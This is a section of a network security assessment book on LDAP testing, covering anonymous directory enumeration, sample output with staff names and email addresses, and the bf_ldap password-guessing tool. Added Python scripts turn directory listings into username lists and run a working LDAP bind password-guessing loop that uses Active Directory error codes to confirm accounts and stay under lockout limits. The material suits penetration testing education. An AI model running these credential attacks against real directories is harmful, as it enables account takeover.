5.7 LDAP


The Lightweight Directory Access Protocol (LDAP) service, which listens on TCP port 389 by default (636 for LDAP over SSL), is commonly found running on Windows 2000 Active Directory, Exchange, and Lotus Domino servers. It provides user directory information to clients. LDAP is highly extensible and widely supported by client and server software including Apache, MS Exchange, Outlook, and Netscape Communicator.

5.7.1 Anonymous LDAP Access

You can query LDAP anonymously (although mileage varies depending on the server configuration) using the ldp.exe utility from the Microsoft Windows 2000 Support Tools Kit found on the Windows 2000 installation CD under the \support\tools\ directory.

The ldapsearch tool, bundled with OpenLDAP (http://www.openldap.org), is a simple Unix-based alternative to ldp.exe. In Example 5-16, I use the tool to perform an anonymous LDAP search against 192.168.0.65 (a Lotus Domino server on Windows 2000). Note that current OpenLDAP releases default to SASL authentication, so an anonymous query needs -x to request a simple bind, and -H ldap://192.168.0.65 replaces the older -h host syntax. If a server refuses an anonymous search of the directory itself, the root DSE (ldapsearch -x -H ldap://host -s base -b "" namingContexts) is normally still readable and reveals the base DN(s) to query.

Example 5-16. Searching the LDAP directory with ldapsearch
# ldapsearch -h 192.168.0.65
< non-relevant results removed for aesthetic purposes >
# Nick Baskett, Trustmatta
dn: CN=Nick Baskett,O=Trustmatta
mail: nick.baskett@trustmatta.com
givenname: Nick
sn: Baskett
cn: Nick Baskett, nick
uid: nick
maildomain: trustmatta

# Andrew Done, Trustmatta\2C andrew
dn: CN=Andrew Done,O=Trustmatta\, andrew
mail: andrew.done@trustmatta.com
givenname: Andrew
sn: Done
uid: andrew
maildomain: trustmatta

# James Woodcock, Trustmatta\2C james
dn: CN=James Woodcock,O=Trustmatta\, james
mail: james.woodcock@trustmatta.com
givenname: James
sn: Woodcock
uid: james
maildomain: trustmatta

# Jim Chalmers, Trustmatta\2C jim
dn: CN=Jim Chalmers,O=Trustmatta\, jim
mail: jim.chalmers@trustmatta.com
givenname: Jim
sn: Chalmers
uid: Jim
maildomain: trustmatta
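The value of anonymous enumeration is the username list it yields for the password-guessing step that follows. The following Python 3 script is an added example, not code from the book: it parses the LDIF that ldapsearch emits (handling comment lines, folded continuation lines, base64-encoded values and escaped commas in DNs) and derives candidate logon names from the uid, mail and CN attributes. The LDIF embedded in it is constructed for the example from two of the Example 5-16 entries, with a folded line and a base64 value added so that those parsing paths are exercised; the attribute names and usernames are otherwise as shown above.

```python
"""Turn ldapsearch LDIF output into a candidate username list.

Added example, not code from the book. Consumes output of the kind shown in
Example 5-16 and produces the user list a brute-force tool such as bf_ldap
takes via -U. SAMPLE_LDIF is constructed here for demonstration.
"""
import base64
import re

# Constructed sample in the form ldapsearch prints: '#' comment lines, a
# folded continuation line (leading space), a base64 value ('::') and an
# escaped comma in a DN, as seen in the Domino output of Example 5-16.
SAMPLE_LDIF = """\
# Nick Baskett, Trustmatta
dn: CN=Nick Baskett,O=Trustmatta
mail: nick.baskett@trustmatta.com
givenname: Nick
sn: Baskett
cn: Nick Baskett
uid: nick
maildomain: trustmatta

# Andrew Done, Trustmatta\\2C andrew
dn: CN=Andrew Done,O=Trustmatta\\, andrew
mail: andrew.done@trustm
 atta.com
givenname:: QW5kcmV3
sn: Done
uid: andrew
maildomain: trustmatta
"""


def parse_ldif(text):
    """Return one {attribute: [values]} dict per LDIF entry (attribute names lowercased)."""
    lines = []
    for raw in text.splitlines():
        # A line starting with a single space continues the previous line (RFC 2849 folding).
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:                 # trailing "" flushes the last entry
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):             # 'attr:: <base64>' form
            value = base64.b64decode(value[1:].strip()).decode("utf-8")
        else:
            value = value.strip()
        current.setdefault(attr.strip().lower(), []).append(value)
    return entries


def split_dn(dn):
    """Split a DN into RDNs on unescaped commas, resolving '\\,' and '\\2C' escapes (RFC 4514)."""
    parts, buf, i = [], "", 0
    while i < len(dn):
        c = dn[i]
        if c == "\\" and i + 1 < len(dn):
            if re.fullmatch(r"[0-9A-Fa-f]{2}", dn[i + 1:i + 3]):
                buf += chr(int(dn[i + 1:i + 3], 16))   # hex-pair escape
                i += 3
            else:
                buf += dn[i + 1]                        # backslash-quoted character
                i += 2
            continue
        if c == ",":
            parts.append(buf.strip())
            buf = ""
        else:
            buf += c
        i += 1
    parts.append(buf.strip())
    return parts


def candidate_usernames(entries):
    """Collect likely logon names: uid/sAMAccountName, the mail local part, and the CN of the DN."""
    names = []
    for e in entries:
        for attr in ("uid", "samaccountname"):
            names.extend(e.get(attr, []))
        for mail in e.get("mail", []):
            names.append(mail.split("@", 1)[0])
        for dn in e.get("dn", []):
            key, _, val = split_dn(dn)[0].partition("=")
            if key.strip().lower() == "cn":
                names.append(val)
    seen, out = set(), []                      # de-duplicate case-insensitively, keep order
    for n in names:
        if n.lower() not in seen:
            seen.add(n.lower())
            out.append(n)
    return out


if __name__ == "__main__":
    for name in candidate_usernames(parse_ldif(SAMPLE_LDIF)):
        print(name)
```

Feed it real output by running ldapsearch with -LLL, which suppresses the comment and version lines, and redirecting to a file. The CN and mail local part are included alongside uid because Windows and Domino installations differ in which of the three actually serves as the logon name.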

5.7.2 LDAP Brute Force

Anonymous access to LDAP is of limited use. If LDAP is found running under Windows 2000, an attacker can launch a brute-force password-guessing attack against it. The Unix-based bf_ldap tool, available from http://www.xfocus.net/exploits, is useful for this.

Here is a list of bf_ldap command-line options:

# bf_ldap
Eliel Sardanons <eliel.sardanons@philips.edu.ar>
Usage: bf_ldap <parameters> <optional>
parameters:
        -s server
        -d domain name
        -u|-U username | users list file name
        -L|-l passwords list | length of passwords to generate
optional:
        -p port (default 389)
        -v (verbose mode)
        -P Ldap user path (default ,CN=Users,)

Under Windows 2000 and most other environments, valid user account passwords can be compromised using bf_ldap. Each guess is an LDAP simple bind, so it counts against the domain's account lockout policy and, where auditing is enabled, is recorded as a failed logon; keep the guess rate per account below the lockout threshold. A compromised LDAP username and password combination will usually grant access to other system services (NetBIOS, mail services, etc.) as well, because the directory credentials are the domain credentials.
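What bf_ldap does for each guess is a single LDAPv3 simple bind. The following Python 3 script is an added example, not code from the book or from bf_ldap: it hand-encodes the BER/ASN.1 BindRequest, decodes the server's BindResponse, and interprets the "data NNN" sub-codes that Active Directory places in the diagnostic message, which distinguish a wrong password (52e) from a non-existent (525) or locked-out (775) account. The AD sub-code table and the socket code are general LDAP/AD behaviour; the host name, DN template and word lists in the helper signatures are placeholders rather than values from the book.

```python
"""Minimal LDAPv3 simple-bind client, the primitive behind LDAP password guessing.

Added example, not code from the book or from bf_ldap. Encodes the BindRequest
a guessing tool sends, decodes the BindResponse, and reads the Active Directory
diagnostic sub-codes. Hosts, DN templates and word lists are placeholders.
"""
import re
import socket

SUCCESS, INVALID_CREDENTIALS = 0, 49          # LDAP resultCode values (RFC 4511)

# Active Directory sub-codes carried in diagnosticMessage ("... data 52e, v1db1")
AD_BIND_CODES = {
    "525": "user not found", "52e": "invalid credentials",
    "530": "logon not permitted at this time", "531": "logon not permitted at this workstation",
    "532": "password expired", "533": "account disabled", "701": "account expired",
    "773": "user must reset password", "775": "account locked out",
}


def ber_len(n):
    """BER length octets: short form below 128, else 0x80|count followed by big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(value):
    """Non-negative INTEGER; a leading 0x00 keeps a set high bit from reading as negative."""
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return tlv(0x02, body)


def build_bind_request(msg_id, dn, password):
    """LDAPMessage { messageID, [APPLICATION 0] BindRequest { version 3, name, simple [0] pw } }."""
    bind = tlv(0x60, ber_int(3) + tlv(0x04, dn.encode()) + tlv(0x80, password.encode()))
    return tlv(0x30, ber_int(msg_id) + bind)


def build_bind_response(msg_id, code, diag):
    """Encode a BindResponse as a server would; used here to construct offline test data."""
    result = tlv(0x0A, bytes([code])) + tlv(0x04, b"") + tlv(0x04, diag.encode())
    return tlv(0x30, ber_int(msg_id) + tlv(0x61, result))


def read_tlv(buf, pos):
    """Decode one TLV at pos; return (tag, value_bytes, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        return tag, buf[pos + 2:pos + 2 + first], pos + 2 + first
    count = first & 0x7F
    length = int.from_bytes(buf[pos + 2:pos + 2 + count], "big")
    start = pos + 2 + count
    return tag, buf[start:start + length], start + length


def parse_bind_response(data):
    """Return (messageID, resultCode, diagnosticMessage) from an encoded BindResponse."""
    tag, msg, _ = read_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    _, mid, pos = read_tlv(msg, 0)
    op_tag, op, _ = read_tlv(msg, pos)
    if op_tag != 0x61:                        # [APPLICATION 1] BindResponse
        raise ValueError("not a BindResponse (tag 0x%02x)" % op_tag)
    _, code, pos = read_tlv(op, 0)            # ENUMERATED resultCode
    _, _matched_dn, pos = read_tlv(op, pos)   # matchedDN (usually empty)
    _, diag, _ = read_tlv(op, pos)            # diagnosticMessage
    return int.from_bytes(mid, "big"), int.from_bytes(code, "big"), diag.decode(errors="replace")


def ad_bind_hint(diag):
    """Map the 'data NNN' token of an AD diagnostic to its meaning, or None if absent."""
    m = re.search(r"\bdata ([0-9a-f]{3})\b", diag)
    return AD_BIND_CODES.get(m.group(1)) if m else None


def try_bind(host, dn, password, port=389, timeout=5.0):
    """One guess over a fresh TCP connection; returns (resultCode, diagnosticMessage)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_bind_request(1, dn, password))
        data = s.recv(4096)                   # a BindResponse fits one segment in practice
    _, code, diag = parse_bind_response(data)
    return code, diag


def guess_passwords(host, dn_template, users, passwords, port=389):
    """bf_ldap-style loop: dn_template takes the username via %s, like bf_ldap's -P path.
    Moves on from a user as soon as AD reports the account non-existent or locked out."""
    found = []
    for user in users:
        for pw in passwords:
            code, diag = try_bind(host, dn_template % user, pw, port)
            if code == SUCCESS:
                found.append((user, pw))
                break
            if ad_bind_hint(diag) in ("user not found", "account locked out"):
                break                         # further guesses are wasted or harmful
    return found
```

A call such as guess_passwords("dc.example.test", "CN=%s,CN=Users,DC=example,DC=test", users, passwords) mirrors bf_ldap's -s, -P and -U/-L options. Against Active Directory the bind name need not be a DN: user@domain and DOMAIN\user are also accepted. Simple binds carry the password in cleartext, so on a live engagement prefer port 636 (or 3269 for the global catalog) with TLS, and remember that the 525/52e distinction lets you confirm valid usernames without ever guessing a password.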

LDAP services that run as part of Oracle, GroupWise, Exchange, and other server software packages have also contained overflow vulnerabilities and other bugs that allow unauthorized access to be gained; these are covered in Section 5.7.4. Check the MITRE CVE list to ensure that the LDAP service and version you have found isn't vulnerable in its current configuration.

5.7.3 Active Directory Global Catalog

Windows 2000 Active Directory exposes an LDAP-based service called the global catalog on TCP port 3268 (3269 for SSL). The global catalog holds a partial, read-only replica of every object in the Active Directory (AD) forest: users, servers and devices, with a subset of their attributes. Because the global catalog is an LDAP service, you can use the ldp.exe and ldapsearch utilities (along with a valid username and password combination) to enumerate a given Active Directory, including users, groups, servers, policies, and other information. Just remember to point the utility at port 3268 instead of 389; only the attributes in the partial attribute set are returned from the global catalog, so query port 389 on a domain controller when you need the full attribute set of a single domain.

5.7.4 LDAP Process Manipulation Vulnerabilities

LDAP services running as part of Oracle, GroupWise, and other server software suites are publicly known to be vulnerable to process manipulation attacks ranging from crashes on malformed requests to exploitable memory corruption bugs. For current information relating to known LDAP issues, search the MITRE CVE list. The CERT knowledge base at http://www.kb.cert.org/vuls/ lists a number of remotely exploitable LDAP vulnerabilities (excluding denial of service and locally exploitable issues), as shown in Table 5-4. The three entries dated 16/07/2001 came out of the University of Oulu PROTOS LDAPv3 test-suite work and are documented together in CERT Advisory CA-2001-18.

Table 5-4. Remotely exploitable LDAP vulnerabilities

CERT ID      Date         Notes
VU#118277    18/10/2000   Oracle Internet Directory LDAP buffer overflow
VU#583184    16/07/2001   Multiple Lotus Domino R5 Server family LDAP bugs
VU#276944    16/07/2001   Multiple iPlanet Directory Server LDAP bugs
VU#869184    16/07/2001   Multiple Oracle Internet Directory LDAP bugs



Network Security Assessment: Know Your Network
ISBN: 059600611X
Year: 2006
Authors: Chris McNab